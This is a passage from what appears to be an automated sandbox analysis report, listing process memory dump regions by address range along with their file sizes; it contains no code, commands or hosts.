                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/3944-323-0x0000000006580000-0x0000000006581000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/3944-328-0x0000000005EA0000-0x0000000005EA1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4028-403-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4048-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4052-447-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4084-302-0x000000001BC10000-0x000000001BC12000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/4084-298-0x0000000000A40000-0x0000000000A41000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4084-260-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4084-296-0x0000000000A10000-0x0000000000A1A000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      40KB

                                                                                                                                                                                                                                                                                                    • memory/4084-270-0x0000000000090000-0x0000000000091000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4092-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4132-294-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4172-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4176-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4256-295-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4256-325-0x000000001B940000-0x000000001B942000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                    • memory/4256-330-0x00000000014D0000-0x00000000014D1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4256-304-0x0000000000DA0000-0x0000000000DA1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4256-327-0x00000000014F0000-0x0000000001513000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      140KB

                                                                                                                                                                                                                                                                                                    • memory/4256-319-0x00000000014C0000-0x00000000014C1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4264-143-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4296-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4312-406-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4368-313-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4388-178-0x0000000004C1A000-0x0000000004D1B000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                                                                                    • memory/4388-180-0x0000000003200000-0x000000000334A000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1.3MB

                                                                                                                                                                                                                                                                                                    • memory/4388-173-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4424-210-0x000002CDE2E40000-0x000002CDE2EB1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                    • memory/4424-184-0x00007FF69C814060-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4472-300-0x0000000004E30000-0x0000000004EA6000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      472KB

                                                                                                                                                                                                                                                                                                    • memory/4472-278-0x0000000000670000-0x0000000000671000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4472-251-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4520-366-0x0000000005440000-0x000000000593E000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      5.0MB

                                                                                                                                                                                                                                                                                                    • memory/4520-335-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                                                                    • memory/4520-337-0x000000000041888A-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4520-351-0x0000000005520000-0x0000000005521000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4536-301-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4708-283-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4708-291-0x000002D294E00000-0x000002D294E01000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/4756-205-0x00000279A4A70000-0x00000279A4AE1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                    • memory/4756-203-0x00000279A49B0000-0x00000279A49FC000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                                                                    • memory/4984-343-0x000000000041884A-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/4984-369-0x0000000004EF0000-0x00000000054F6000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                                                                    • memory/4984-339-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                                                                    • memory/4988-356-0x0000000004F50000-0x0000000005556000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                                                                    • memory/4988-331-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                                                                    • memory/4988-332-0x0000000000418836-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5108-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5108-312-0x0000000005A40000-0x0000000005A41000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/5108-329-0x00000000059E0000-0x00000000059ED000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      52KB

                                                                                                                                                                                                                                                                                                    • memory/5108-263-0x0000000000FF0000-0x0000000000FF1000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                    • memory/5116-293-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5116-395-0x0000000000400000-0x00000000004AA000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      680KB

                                                                                                                                                                                                                                                                                                    • memory/5116-394-0x0000000002130000-0x00000000021CD000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      628KB

                                                                                                                                                                                                                                                                                                    • memory/5124-441-0x000002373ECA0000-0x000002373ED0E000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      440KB

                                                                                                                                                                                                                                                                                                    • memory/5124-402-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5124-442-0x000002373ED10000-0x000002373EDDF000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      828KB

                                                                                                                                                                                                                                                                                                    • memory/5140-404-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5156-405-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5244-434-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5396-409-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5460-410-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5608-443-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5780-418-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5988-430-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                    • memory/5988-450-0x0000000002290000-0x00000000023AB000-memory.dmp
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1.1MB